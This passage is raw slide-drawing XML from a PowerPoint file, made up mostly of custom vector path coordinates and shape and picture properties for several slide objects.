                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429827" y="563101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430091" y="562784"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="438175" y="556854"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="424932" y="556854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429115" y="562784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428449" y="562784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430383" y="562435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438175" y="562435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438175" y="556854"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="430383" y="562435"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="428449" y="562784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430091" y="562784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430383" y="562435"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="373299" y="529088"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="333757" y="529088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337480" y="529296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335585" y="529739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424932" y="561533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424932" y="556854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438175" y="556854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438175" y="552174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373299" y="529088"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="511693" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="90652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="543027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25731" y="556277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97979" y="543463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29803" y="543463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25619" y="542831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27817" y="542441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21100" y="538982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="538982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9650" y="533086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="533086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="102736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7775" y="102736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="96210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44612" y="96210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510336" y="13700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508614" y="13029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="13029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="10385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511693" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="181524" y="544009"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="176189" y="545069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="550512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181524" y="544009"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="189432" y="544009"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="181524" y="544009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="550512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189432" y="550512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189432" y="544009"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="189432" y="521686"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="176189" y="521686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183966" y="528212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="529592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="545069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181524" y="544009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189432" y="544009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189432" y="521686"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="27817" y="542441"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25619" y="542831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29803" y="543463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27817" y="542441"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="189432" y="513776"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="27817" y="542441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29803" y="543463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97979" y="543463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="529592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="521686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189432" y="521686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189432" y="513776"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="9650" y="533086"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="13243" y="538982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="534936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9650" y="533086"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="13243" y="534936"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="13243" y="538982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21100" y="538982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="534936"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="525120" y="453305"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="312076" y="491937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312076" y="535230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335585" y="529739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333757" y="529088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373299" y="529088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367078" y="526875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325320" y="526875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317197" y="520418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325320" y="518521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325320" y="503998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319884" y="503998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325320" y="497472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355873" y="497472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="464379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="458845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525120" y="458845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525120" y="453305"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="13243" y="533086"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9650" y="533086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="534936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="533086"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="333757" y="529088"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="335585" y="529739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337480" y="529296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333757" y="529088"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="176189" y="521686"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="176189" y="529592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183966" y="528212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="521686"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="325320" y="518521"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="317197" y="520418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325320" y="526875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325320" y="518521"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="336359" y="515944"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="325320" y="518521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325320" y="526875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367078" y="526875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336359" y="515944"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="325320" y="497472"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="319884" y="503998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325320" y="503012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325320" y="497472"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="325320" y="503012"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="319884" y="503998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325320" y="503998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325320" y="503012"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="355873" y="497472"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="325320" y="497472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325320" y="503012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355873" y="497472"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="530563" y="452318"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="525120" y="453305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525120" y="458845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530563" y="452318"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="538363" y="452318"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="530563" y="452318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525120" y="458845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="458845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="452318"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="525120" y="19456"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="525120" y="453305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530563" y="452318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="452318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="21100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529343" y="21100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525120" y="19456"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="13243" y="96210"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7775" y="102736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="101768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="96210"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="13243" y="101768"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7775" y="102736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="102736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="101768"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="44612" y="96210"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="13243" y="96210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="101768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44612" y="96210"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="525120" y="14920"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="525120" y="19456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529343" y="21100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525120" y="14920"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="538363" y="14920"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="525120" y="14920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529343" y="21100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="21100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="14920"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="538363" y="13029"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="508614" y="13029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512169" y="13375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510336" y="13700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525120" y="19456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525120" y="14920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="14920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="13029"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="508614" y="13029"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="510336" y="13700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512169" y="13375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508614" y="13029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3" name="object 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{312230E3-03BD-386E-2C11-2EB52DD62E1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06323" y="3448270"/>
              <a:ext cx="398449" cy="407026"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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FF770214-7237-0BF8-F29D-9BED7630E6E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5721543" y="2362587"/>
              <a:ext cx="66040" cy="356870"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="66039" h="356869">
                  <a:moveTo>
                    <a:pt x="15567" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49584" y="347281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65727" y="356495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15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8DEC6D6F-A7E4-83D4-11ED-1804CC6441AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5729728" y="2280246"/>
              <a:ext cx="513715" cy="440690"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="460004" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="80675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54069" y="440534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80354" y="436019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60386" y="436019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56379" y="433124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59861" y="432526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7931" y="86895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4520" y="86895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7343" y="82978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26850" y="82978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454196" y="8031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453677" y="4522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460673" y="4522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460004" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="59861" y="432526"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="56379" y="433124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60386" y="436019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59951" y="433124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59861" y="432526"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="505650" y="355947"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="59861" y="432526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60386" y="436019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80354" y="436019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513478" y="361617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513134" y="359291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506144" y="359291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505650" y="355947"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="508981" y="355374"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="505650" y="355947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506144" y="359291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508981" y="355374"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="512555" y="355374"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="508981" y="355374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506144" y="359291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513134" y="359291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512639" y="355947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512555" y="355374"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="460673" y="4522"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="453677" y="4522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457698" y="7417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454196" y="8031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505565" y="355374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505650" y="355947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508981" y="355374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512555" y="355374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460673" y="4522"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="7343" y="82978"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4520" y="86895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7843" y="86312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7343" y="82978"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="7843" y="86312"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4520" y="86895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7931" y="86895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7843" y="86312"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="26850" y="82978"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7343" y="82978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7843" y="86312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26850" y="82978"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="453677" y="4522"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="454105" y="7417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454196" y="8031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457698" y="7417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453677" y="452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6" name="object 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{019A404C-C604-A7FD-4C50-F011F39356B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3650" y="2284262"/>
              <a:ext cx="505643" cy="432517"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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3D65526C-0418-6B75-E95D-C3DD87AD150B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5779775" y="2328032"/>
              <a:ext cx="414020" cy="347980"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="414020" h="347980">
                  <a:moveTo>
                    <a:pt x="373034" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="63351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42088" y="347857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413393" y="281050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373034" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1B3D6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8" name="object 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECA2B3D8-111C-56AD-C224-D5368F10E60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87270" y="2639030"/>
              <a:ext cx="672269" cy="181415"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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FB9F74BB-0F45-834B-3E87-AC32927E15D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5788411" y="2635628"/>
              <a:ext cx="451484" cy="85090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="451485" h="85089">
                  <a:moveTo>
                    <a:pt x="450290" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="77749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1177" y="84552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451474" y="6803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45029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770D2407-1B48-D04F-AB51-10BC6F3FF077}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5851258" y="2651709"/>
              <a:ext cx="428625" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="428625" h="95250">
                  <a:moveTo>
                    <a:pt x="72072" y="72567"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="38633" y="60464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="64503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33439" y="77177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72072" y="72567"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="428625" h="95250">
                  <a:moveTo>
                    <a:pt x="121081" y="88112"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="87642" y="77177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49009" y="81775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82448" y="95021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121081" y="88112"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="428625" h="95250">
                  <a:moveTo>
                    <a:pt x="131457" y="62191"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="97447" y="50101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60540" y="57010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92824" y="67386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131457" y="62191"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="428625" h="95250">
                  <a:moveTo>
                    <a:pt x="190271" y="50685"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="157403" y="39738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118770" y="46075"/>
